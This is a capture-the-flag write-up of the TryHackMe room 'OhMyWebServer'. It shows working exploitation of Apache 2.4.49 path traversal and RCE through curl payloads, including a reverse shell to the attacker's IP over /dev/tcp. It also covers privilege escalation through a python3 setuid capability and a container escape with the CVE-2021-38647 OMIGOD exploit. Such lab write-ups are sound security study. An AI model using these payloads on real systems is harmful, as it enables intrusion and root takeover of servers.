# CTF TryHackMe - OhMyWebServer

## Nmap 

```bash
nmap -A -Pn -oN nmap.log 10.10.222.195
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 00:55 EDT
Nmap scan report for 10.10.222.195
Host is up (0.065s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
|   256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_  256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Consult - Business Consultancy Agency Template | Home
|_http-server-header: Apache/2.4.49 (Unix)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.84 seconds
```

Ports open :
* 22 - SSH (OpenSSH 8.2p1)
* 80 - HTTP (Apache httpd 2.4.49)

## Apache vulnerable version

Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)

I searched for an exploit on github, found this one : 

```
git clone https://github.com/thehackersbrain/CVE-2021-41773.git
```

Let's execute :

```bash
python3 exploit.py -t 10.10.222.195         
--------------------------------------------------------
|                Apache2 2.4.49 - Exploit              |
--------------------------------------------------------
>>> id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```

It's works :)

## Enumerating target 

It seems we are on a docker container

```bash
$ hostname
4a70924bafa0
```

It seems also we are on a restricted shell, i can't cd in other directory. Blocked in */bin*

After searching a while, i have listed the capabilities :

```bash
>>> getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
```

It is possible to exploit this :

```bash
>>> /usr/bin/python3 -c 'import os; os.setuid(0); os.system("id");'           
uid=0(root) gid=1(daemon) groups=1(daemon)
```

## Shell as root of container 

```bash
curl 'http://10.10.26.82/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

curl 'http://10.10.26.82/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /tmp/revshell.sh'

curl 'http://10.10.26.82/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/tcp/10.8.90.22/9001 0>&1" >> /tmp/revshell.sh'

curl 'http://10.10.26.82/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; bash /tmp/revshell.sh'
```

Now use, use the python capabilities to get root shell :

```bash
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh");'
```

Yes! We are root of the container :D

```bash
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh");'
id
uid=0(root) gid=1(daemon) groups=1(daemon)
```

## Docker Container Escape

Running deepce.sh

Nothing interessing, except we discover another IP during the scan ;

```
[+] Host IP ................. 172.17.0.1
```

Let's to upload nmap binary(https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) on container :

```bash
curl http://10.8.90.22:8000/nmap -o /tmp/nmap
```

Go launch a scan on all ports :

```bash
./nmap -p- 172.17.0.1

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-07-28 05:16 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.

Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Host is up (0.00040s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown
```

Some research on port 5986 inform me about 5986 port redirect me on this **CVE-2021-38647** . found an exploit that i have downloaded on my kali

```bash
wget https://raw.githubusercontent.com/CyberMonitor/CVE-2021-38648/main/CVE-2021-38647.py
```

Then upload to the docker container

```bash
curl http://10.8.90.22:8000/CVE-2021-38647.py -o CVE-2021-38647.py
```

En execute this one : 

```bash
python3 CVE-2021-38647.py -t 172.17.0.1 -p 5986 -c id
<thon3 CVE-2021-38647.py -t 172.17.0.1 -p 5986 -c id
uid=0(root) gid=0(root) groups=0(root)
```

And yeah, finally Root ! :D

